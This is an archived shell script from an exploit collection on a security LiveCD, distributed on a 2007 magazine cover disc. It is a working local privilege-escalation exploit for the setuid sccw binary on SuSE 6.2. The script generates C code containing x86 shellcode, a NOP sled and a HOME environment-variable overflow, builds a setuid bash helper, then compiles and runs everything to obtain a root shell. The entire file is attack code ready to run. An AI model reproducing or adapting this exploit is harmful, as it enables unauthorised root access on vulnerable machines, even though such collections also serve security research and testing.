home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / sccw.sh < prev    next >
Encoding:
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  1.8 KB  |  103 lines
  1. #!/bin/bash
  2. #
  3. # Linux x86 exploit for /usr/bin/sccw on SuSE 6.2
  4. #
  5. # -Brock Tellier btellier@webley.com
  6.  
  7. echo "Building /tmp/sccwx.c..."
  8. cat > /tmp/sccwx.c << FOEFOE
  9. /*
  10.  * sccw local root Linux x86 tested on SuSE 6.2
  11.  * gcc -o sccwx sccwx.c
  12.  * must compile/run a setuid(geteuid()); system("/bin/bash"); for a
  13. rootshell
  14.  *
  15.  * -Brock Tellier btellier@webley.com
  16.  */
  17.  
  18.  
  19. #include <stdlib.h>
  20. #include <stdio.h>
  21.  
  22. char exec[]= /* Generic Linux x86 running our /tmp program */
  23.   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  24.   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  25.   "\x80\xe8\xdc\xff\xff\xff/tmp/sc";
  26.  
  27.  
  28.  
  29. #define LEN 400
  30. #define NOP 0x90
  31.  
  32. unsigned long get_sp(void) {
  33.  
  34. __asm__("movl %esp, %eax");
  35.  
  36. }
  37.  
  38.  
  39. void main(int argc, char *argv[]) {
  40.  
  41. int offset=0;
  42. int i;
  43. int buflen = LEN;
  44. long int addr;
  45. char buf[LEN];
  46.  
  47.  if(argc > 3) {
  48.   fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
  49.  exit(0);
  50.  }
  51.  else if (argc == 2){
  52.    offset=atoi(argv[1]);
  53.  
  54.  }
  55.  else if (argc == 3) {
  56.    offset=atoi(argv[1]);
  57.    buflen=atoi(argv[2]);
  58.  
  59.  }
  60.  else {
  61.    offset=2100;
  62.    buflen=300;
  63.  
  64.  }
  65.  
  66.  
  67. addr=get_sp();
  68.  
  69. fprintf(stderr, "SuSE 6.2 sccw local root\n");
  70. fprintf(stderr, "Brock Tellier btellier@webley.com\n");
  71. fprintf(stderr, "Using addr: 0x%x\n", addr+offset);
  72.  
  73. memset(buf,NOP,buflen);
  74. memcpy(buf+(buflen/2),exec,strlen(exec));
  75. for(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4)
  76.  *(int *)&buf[i]=addr+offset;
  77.  
  78. setenv("HOME", buf, 1);
  79. execl("/usr/bin/sccw", "sccw", NULL);
  80.  
  81. }
  82. FOEFOE
  83.  
  84. echo "Building /tmp/sccwuid.c..."
  85.  
  86. cat > /tmp/sccwuid.c <<EOFFOE
  87. void main()
  88. {
  89.     setuid(geteuid());
  90.     system("/bin/bash");
  91. }
  92. EOFFOE
  93.  
  94. echo "Compiling /tmp/sccwx..."
  95. gcc -o /tmp/sccwx /tmp/sccwx.c
  96.  
  97. echo "Compiling /tmp/sc..."
  98. gcc -o /tmp/sc /tmp/sccwuid.c
  99.  
  100. echo "Launching /tmp/sccwx..."
  101. /tmp/sccwx
  102. echo "If it didn't work, try /tmp/sccwx <offset> <bufsiz>"
  103.